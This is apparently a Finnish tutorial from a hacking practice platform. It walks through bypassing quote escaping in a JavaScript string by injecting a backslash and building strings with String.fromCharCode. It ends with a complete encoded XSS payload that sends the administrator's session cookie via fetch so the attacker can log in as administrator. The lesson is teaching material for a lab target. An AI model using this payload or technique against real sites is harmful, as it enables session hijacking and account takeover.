Tässä moduulissa hyväksikäytämme harjoituskohteessa olevaa XSS-haavoittuvuutta, joten voit käynnistää alla olevan tehtävän ja toistaa vaiheet omassa tahdissa.

Tässä tehtävässä käytämme hyväksi XSS haavoittuvuutta, johtuen sovelluksen turvattomasta tavasta asettaa sekä käsitellä käyttäjän syötettä JavaScript merkkijonossa.

XSS merkkijonoissa 2

Jatketaan edellisestä moduulin aihepiirissä. Tällä kertaa kehittäjät ovat parantaneet syötteen käsittelyä, eikä edellinen haittakoodimme toimi enää.

Aloitamme selvittämällä, mitä muutoksia kehittäjät ovat tehneet, kokeilemalla seuraavanlaista yhdistelmää.

Aivan, kehittäjät ovat lisänneet heittomerkkien pakenemisen sovellukseen, jolloin JavaScript-koodi kohtelee heittomerkkejä osana merkkijonoa. Pakenemisella tarkoitetaan kenoviivojen käyttämistä tilanteissa, jossa halutaan käyttää merkkijonon rikkovia merkkejä osana merkkijonoa.

Alla oleva merkkijono sisältää yhden heittomerkin ja kenoviivaa käytetään tämän sisällyttämiseen merkkijonon sisään ilman, että heittomerkki rikkoo merkkijonon määritelmää.

Jatkamme analyysia katsomalla, miten sovellus kohtelee itse kenoviivaa, eli pystymmekö pakenemaan kenoviivaa. Syötämme seuraavan.

Hienoa, sovellus ei pakene itse kenoviivaa. Tämä tarkoittaa, että voimme käyttää kenoviivaa heittomerkin edessä, jolloin lopullisessa JavaScript-koodissa, sovellus pakenee kenoviivamme ja pystymme rikkomaan merkkijonon sekä kirjoittamaan omaa JavaScript-koodiamme. Mutta, koska sovellus pakenee kaikki syöttämämme heittomerkit, emme voi luoda omia merkkijonoja sovellukseen, emmekä voi rakentaa haittakoodiamme tavalliseen tapaan. Onneksi JavaScript-kielessä on sisäänrakennettu funktio nimeltään 

, jonka avulla merkkijonoja voi rakentaa käyttämättä heittomerkkejä ollenkaan. Tämä toimii seuraavanlaisesti.

 funktion avulla voit rakentaa, minkä vain haluamasi merkkijonon. 

 linkistä löydät listauksen merkeistä ja näiden char code arvoista. 

Tuplavarmistamme vielä haavoittuvuuden kokeilemme vielä käyttää yllä mainittua funktiota hälytyslaatikon luomisessa.

Luomme 'xss' merkkijonon ja tallennamme tämän muuttujaan x. Sitten syötämme x muuttujan alert funktioon.

Lopuksi suoritamme hyökkäyksen käyttämällä samaa ideaa kuin edellisessä moduulissa, eli käytämme sovellukseen rakennettua linkkien tallennus toimintoa järjestelmänvalvojan istuntoevästeen vuotamiseen. Tämä tapahtuu seuraavissa vaiheissa.

Muokkaamme edellistä haittakoodiamme siten, että tämä käyttää 

 funktiota jokaisen merkkijonon kohdalla.

Lisäämme sivulle linkin, joka sisältää lopullisen URL-osoitteen, jossa haittakoodimme sijaitsee. Tässä käytetään 

Odotamme, että järjestelmänvalvoja kokeilee linkkiämme, joka pakottaa järjestelmänvalvojan selaimen luomaan itse uuden linkin, sisältäen hänen istuntoevästeet

Kirjaudumme sisään järjestelmänvalvojana

Kokeile toistaa listatut vaiheet itse! - Voit ottaa mallia aiemmista moduuleista.

Voit ratkaista tehtävän lisäämällä sivulle seuraavan näköisen linkin.

Haittakoodiosuutemme näyttää seuraavanlaiselta.

Ja kauniisti kirjoitettuna seuraavanlaiselta.

Näin ratkaiset tehtävän; muista yrittää ensin itse!

*Tässä moduulissa hyväksikäytämme harjoituskohteessa olevaa XSS-haavoittuvuutta, joten voit käynnistää alla olevan tehtävän ja toistaa vaiheet omassa tahdissa.*

@exercise af74441b1684

Jatketaan edellisestä moduulin aihepiirissä. Tällä kertaa kehittäjät ovat parantaneet syötteen käsittelyä, eikä edellinen haittakoodimme toimi enää.

## Haavoittuvuuden löytäminen

Aloitamme selvittämällä, mitä muutoksia kehittäjät ovat tehneet, kokeilemalla seuraavanlaista yhdistelmää.

```javascript
'; //
```

![](sanity:image-8557463a71b0a4c237218dc3d0e96c848cb0cba4-1118x174-png)

Aivan, kehittäjät ovat lisänneet heittomerkkien pakenemisen sovellukseen, jolloin JavaScript-koodi kohtelee heittomerkkejä osana merkkijonoa. Pakenemisella tarkoitetaan kenoviivojen käyttämistä tilanteissa, jossa halutaan käyttää merkkijonon rikkovia merkkejä osana merkkijonoa.

*Alla oleva merkkijono sisältää yhden heittomerkin ja kenoviivaa käytetään tämän sisällyttämiseen merkkijonon sisään ilman, että heittomerkki rikkoo merkkijonon määritelmää.*

```javascript
const a = '\'';
// a on yhtä kuin '
```

Jatkamme analyysia katsomalla, miten sovellus kohtelee itse kenoviivaa, eli pystymmekö pakenemaan kenoviivaa. Syötämme seuraavan.

```javascript
\'; //
```

![](sanity:image-066268659f7ee187ae9c0e88a8db19f7424e7e14-1134x168-png)

Hienoa, sovellus ei pakene itse kenoviivaa. Tämä tarkoittaa, että voimme käyttää kenoviivaa heittomerkin edessä, jolloin lopullisessa JavaScript-koodissa, sovellus pakenee kenoviivamme ja pystymme rikkomaan merkkijonon sekä kirjoittamaan omaa JavaScript-koodiamme. Mutta, koska sovellus pakenee kaikki syöttämämme heittomerkit, emme voi luoda omia merkkijonoja sovellukseen, emmekä voi rakentaa haittakoodiamme tavalliseen tapaan. Onneksi JavaScript-kielessä on sisäänrakennettu funktio nimeltään **fromCharCode**, jonka avulla merkkijonoja voi rakentaa käyttämättä heittomerkkejä ollenkaan. Tämä toimii seuraavanlaisesti.

```javascript
var x = String.fromCharCode(120,115,115);
/*
  120 == x, 
  115 == s, 
  115 == s 
  tarkoittaen, että fromCharCode funktio palauttaa meille merkkijonon xss

*/
```

**fromCharCode** funktion avulla voit rakentaa, minkä vain haluamasi merkkijonon. [Tästä](https://www.w3schools.com/charsets/ref_html_ascii.asp) linkistä löydät listauksen merkeistä ja näiden char code arvoista. 

Tuplavarmistamme vielä haavoittuvuuden kokeilemme vielä käyttää yllä mainittua funktiota hälytyslaatikon luomisessa.

*Luomme 'xss' merkkijonon ja tallennamme tämän muuttujaan x. Sitten syötämme x muuttujan alert funktioon.*

```javascript
\'; var x = String.fromCharCode(120,115,115); alert(x); //
```

 

![](sanity:image-b6377db8d277eb762c6b070f51f09c864ad6c864-1366x342-png)

---

## 

---

## Hyödynnä haavoittuvuutta

Lopuksi suoritamme hyökkäyksen käyttämällä samaa ideaa kuin edellisessä moduulissa, eli käytämme sovellukseen rakennettua linkkien tallennus toimintoa järjestelmänvalvojan istuntoevästeen vuotamiseen. Tämä tapahtuu seuraavissa vaiheissa.

- Muokkaamme edellistä haittakoodiamme siten, että tämä käyttää **fromCharCode** funktiota jokaisen merkkijonon kohdalla.
- Lisäämme sivulle linkin, joka sisältää lopullisen URL-osoitteen, jossa haittakoodimme sijaitsee. Tässä käytetään **search** parametria
- Odotamme, että järjestelmänvalvoja kokeilee linkkiämme, joka pakottaa järjestelmänvalvojan selaimen luomaan itse uuden linkin, sisältäen hänen istuntoevästeet
- Kirjaudumme sisään järjestelmänvalvojana

Kokeile toistaa listatut vaiheet itse! - Voit ottaa mallia aiemmista moduuleista.

@embed 4587263531ca


Voit ratkaista tehtävän lisäämällä sivulle seuraavan näköisen linkin.

```javascript
https://www-9zrvaudoae.ha-target.com/?search=%5C%27%3B+var+linkavain+%3D+String.fromCharCode%28108%2C105%2C110%2C107%29%3B+var+linkarvo+%3D+String.fromCharCode%28104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C104%2C97%2C107%2C97%2C116%2C101%2C109%2C105%2C97%2C46%2C102%2C105%2C47%2C63%29%3B+var+linkpolku+%3D+String.fromCharCode%2847%29%3B+var+linkmetodi+%3D+String.fromCharCode%2880%2C79%2C83%2C84%29%3B+var+fdata%3Dnew+FormData%28%29%3B+fdata.append%28linkavain%2Clinkarvo%2Bdocument.cookie%29%3B+fetch%28linkpolku%2C%7Bmethod%3A+linkmetodi%2C+body%3A+fdata%7D%29%3B+%2F%2F
```

Haittakoodiosuutemme näyttää seuraavanlaiselta.

```javascript
\'; var linkavain = String.fromCharCode(108,105,110,107); var linkarvo = String.fromCharCode(104,116,116,112,115,58,47,47,104,97,107,97,116,101,109,105,97,46,102,105,47,63); var linkpolku = String.fromCharCode(47); var linkmetodi = String.fromCharCode(80,79,83,84); var fdata=new FormData(); fdata.append(linkavain,linkarvo+document.cookie); fetch(linkpolku,{method: linkmetodi, body: fdata}); //
```

Ja kauniisti kirjoitettuna seuraavanlaiselta.

```javascript
\';
var linkavain = String.fromCharCode(108,105,110,107);
var linkarvo = String.fromCharCode(104,116,116,112,115,58,47,47,104,97,107,97,116,101,109,105,97,46,102,105,47,63); 
var linkpolku = String.fromCharCode(47); 
var linkmetodi = String.fromCharCode(80,79,83,84); 

var fdata=new FormData(); 
fdata.append(linkavain,linkarvo+document.cookie); 

fetch(linkpolku,{method: linkmetodi, body: fdata}); //
```

XSS JavaScript-merkkijonoissa 2

Opi löytämään ja hyväksikäyttämään haavoittuvuutta joka on yksi kaikista yleisimmistä haavoittuvuuksista, helpohko löytää, ja siitä huolimatta hyvin vaarallinen. Hackerone rankkasi XSS:n #1 bug bounty -haavoittuvuudeksi 2021.

XSS (Cross-Site Scripting) haavoittuvuudet ovat sekä yleisiä että vakavia. Esimerkiksi HackerOne on listannut XSS:n ensimmäiseksi top 10 haavoittuvuudet listallaan.

Haavoittuvuuden läpikohtainen hallitseminen on siis erittäin tärkeää, olit sitten murtotestaaja, tietoturvakonsultti, kehittäjä tai bounty hunteri!

XSS JavaScript-merkkijonoissa 2

Haavoittuvuuden löytäminen

Hakkeroinnin oppiminen alkaa tästä